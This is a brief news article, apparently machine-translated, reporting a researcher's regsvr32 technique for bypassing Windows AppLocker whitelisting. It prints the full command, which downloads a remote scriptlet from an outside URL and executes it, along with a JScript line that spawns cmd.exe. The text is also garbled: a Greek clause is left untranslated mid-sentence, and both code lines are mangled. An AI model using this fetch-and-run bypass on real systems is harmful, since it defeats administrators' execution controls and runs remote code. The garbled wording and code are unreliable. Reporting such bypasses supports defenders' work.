If you use Microsoft AppLocker to lock Windows computers in your office or school, then we have bad news for you.
A security researcher has discovered a way to bypass the Windows software Whitelist and run arbitrary applications.
AppLocker allows IT administrators to manage large networks. They can determine which programs and which scripts can be run by users.
The service first came with the Windows 7, and its goal was to stop the launch of non-work-related programs, or malicious applications, ή για να να σταματήσουν τους τελικούς χρήστες να τρέχουν προγράμματα που χρησιμοποιεί το τμήμα supportof the company or organization.
Security researcher Casey Smith discovered a way to bypass AppLocker. The bypass method is very simple and you will find it below with a line code: a fairly simple command.
regsvr32 / s / n / u /i:http://reg.cx/2kK3 scrobj.dll
If you run the above command in Windows you tell the operating system to download one XML file from the Internet, which instructs you to run cmd.exe.
The magic here is that if you change cmd.exe with any program that is blocked with AppLocker it will start.
"It is not well-documented that Regsvr32.exe cannot accept a URL for a script," Smith said.
In the above case, the built-in JavaScript uses ActiveX:
var r = new ActiveXObject ("WScript.Shell") Run ("cmd.exe");
It is a case of chain linking of various elements in the maze of the code used by Microsoft Windows. All JavaScript, Visual Basic and Powershell scripts can run from the web, or a local file, via regsvr32, according to Smith.
So even if you are connected to the PC as a simple user or visitor you can use the hack to bypass AppLock.
